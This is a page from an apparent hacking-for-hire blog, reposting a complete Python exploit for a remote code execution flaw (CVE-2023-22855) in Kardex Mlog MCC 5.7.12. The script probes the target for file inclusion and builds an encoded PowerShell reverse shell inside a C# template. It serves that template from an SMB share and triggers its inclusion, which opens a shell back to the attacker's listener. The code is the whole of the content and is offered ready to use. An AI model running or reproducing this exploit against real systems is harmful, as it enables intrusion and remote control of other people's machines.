Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86387306

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
#!/usr/bin/env python3

# Exploit Title: Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)
# Date: 12/13/2022
# Exploit Author: Patrick Hener
# Vendor Homepage: https://www.kardex.com/en/mlog-control-center
# Version: 5.7.12+0-a203c2a213-master
# Tested on: Windows Server 2016
# CVE : CVE-2023-22855
# Writeup: https://hesec.de/posts/CVE-2023-22855
#
# You will need to run a netcat listener beforehand: ncat -lnvp <port>
#
import requests, argparse, base64, os, threading
from impacket import smbserver

def probe(target):
	headers = {
		"Accept-Encoding": "deflate"
	}
	res = requests.get(f"{target}/\\Windows\\win.ini", headers=headers)
	if "fonts" in res.text:
		return True
	else:
		return False

def gen_payload(lhost, lport):
	rev_shell_blob = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{{0}};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}};$client.Close()'
	rev_shell_blob_b64 = base64.b64encode(rev_shell_blob.encode('UTF-16LE'))
	payload = f"""<#@ template language="C#" #>
<#@ Import Namespace="System" #>
<#@ Import Namespace="System.Diagnostics" #>
<#
var proc1 = new ProcessStartInfo();
string anyCommand;
anyCommand = "powershell -e {rev_shell_blob_b64.decode()}";
proc1.UseShellExecute = true;
proc1.WorkingDirectory = @"C:\Windows\System32";
proc1.FileName = @"C:\Windows\System32\cmd.exe";
proc1.Verb = "runas";
proc1.Arguments = "/c "+anyCommand;
Process.Start(proc1);
#>"""

	return payload

def start_smb_server(lhost):
	server = smbserver.SimpleSMBServer(listenAddress=lhost, listenPort=445)
	server.addShare("SHARE", os.getcwd(), '')
	server.setSMB2Support(True)
	server.setSMBChallenge('')
	server.start()

def trigger_vulnerability(target, lhost):
	headers = {
		"Accept-Encoding": "deflate"
	}

	requests.get(f"{target}/\\\\{lhost}\\SHARE\\exploit.t4", headers=headers)

def main():
	# Well, args
	parser = argparse.ArgumentParser()
	parser.add_argument('-t', '--target', help='Target host url', required=True)
	parser.add_argument('-l', '--lhost', help='Attacker listening host', required=True)
	parser.add_argument('-p', '--lport', help='Attacker listening port', required=True)
	args = parser.parse_args()

	# Probe if target is vulnerable
	print("[*] Probing target")
	if probe(args.target):
		print("[+] Target is alive and File Inclusion working")
	else:
		print("[-] Target is not alive or File Inclusion not working")
		exit(-1)

	# Write payload to file
	print("[*] Writing 'exploit.t4' payload to be included later on")
	with open("exploit.t4", 'w') as template:
		template.write(gen_payload(args.lhost, args.lport))

	template.close()

	# Start smb server in background
	print("[*] Starting SMB Server in the background")
	smb_server_thread = threading.Thread(target=start_smb_server, name="SMBServer", args=(args.lhost,))
	smb_server_thread.start()

	# Rev Shell reminder
	print("[!] At this point you should have spawned a rev shell listener")
	print(f"[i] 'ncat -lnvp {args.lport}' or 'rlwrap ncat -lnvp {args.lport}'")
	print("[?] Are you ready to trigger the vuln? Then press enter!")
	input() # Wait for input then continue

	# Trigger vulnerability
	print("[*] Now triggering the vulnerability")
	trigger_vulnerability(args.target, args.lhost)

	# Exit
	print("[+] Enjoy your shell. Bye!")
	os._exit(1)



if __name__ == "__main__":
	main()